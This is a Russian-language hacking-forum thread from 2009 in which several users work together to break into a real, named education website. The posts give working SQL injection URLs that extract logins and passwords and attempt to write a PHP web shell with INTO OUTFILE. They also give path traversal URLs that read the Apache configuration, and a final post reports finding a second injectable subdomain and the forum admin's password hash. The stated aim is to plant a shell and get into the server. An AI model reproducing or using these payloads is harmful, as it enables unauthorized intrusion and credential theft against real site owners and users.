HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.06.2009, 12:36
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами: 9129884

Репутация: 240
По умолчанию

Скорпиончик
Вот там еще нашел http://egechita.ru/news/show_news.php?id_news=56+union+select+1,concat_ws( 0x3a,login,pass),3,4,5+from+user+limit+1,1/*
пятая ветка
 
Ответить с цитированием

  #2  
Старый 18.06.2009, 12:51
Скорпиончик
Banned
Регистрация: 16.06.2009
Сообщений: 5
С нами: 8896646

Репутация: -51
По умолчанию

я это находил. эти нечего не дают пассы. надо шелл залить
 
Ответить с цитированием

  #3  
Старый 18.06.2009, 13:18
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами: 9640431

Репутация: 105
По умолчанию

попробуй INTO OUTFILE и ищи папку с правами на запись
 
Ответить с цитированием

  #4  
Старый 18.06.2009, 13:31
Скорпиончик
Banned
Регистрация: 16.06.2009
Сообщений: 5
С нами: 8896646

Репутация: -51
По умолчанию

Цитата:
Сообщение от Fuckel  
попробуй INTO OUTFILE и ищи папку с правами на запись
подскадите как составить запрос на запись файла.
 
Ответить с цитированием

  #5  
Старый 18.06.2009, 13:36
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами: 9640431

Репутация: 105
По умолчанию

например:
http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+

мб пригодится
http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf
 
Ответить с цитированием

  #6  
Старый 18.06.2009, 13:41
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Fuckel

Я вот одного не пойму, зачем советовать то, что не будет работать?
Для записи в файл нужны права, а там их нет у юзера

Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме
 
Ответить с цитированием

  #7  
Старый 18.06.2009, 13:48
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами: 9640431

Репутация: 105
По умолчанию

я посоветовал ему попробывать, не утверждал что будет работать
 
Ответить с цитированием

  #8  
Старый 18.06.2009, 16:28
Скорпиончик
Banned
Регистрация: 16.06.2009
Сообщений: 5
С нами: 8896646

Репутация: -51
По умолчанию

спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
какиенибудь ссылки. Уж очень хочиться проникнуть в серв.
 
Ответить с цитированием

  #9  
Старый 18.06.2009, 16:33
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

https://forum.antichat.ru/thread24488.html
 
Ответить с цитированием

  #10  
Старый 18.06.2009, 18:23
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
С нами: 9968047

Репутация: 48
По умолчанию

2 Скорпиончик

http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00

Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru

смотрим online.egechita.ru и видим

http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--

SQL injection

Хеш админа форума доступен
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.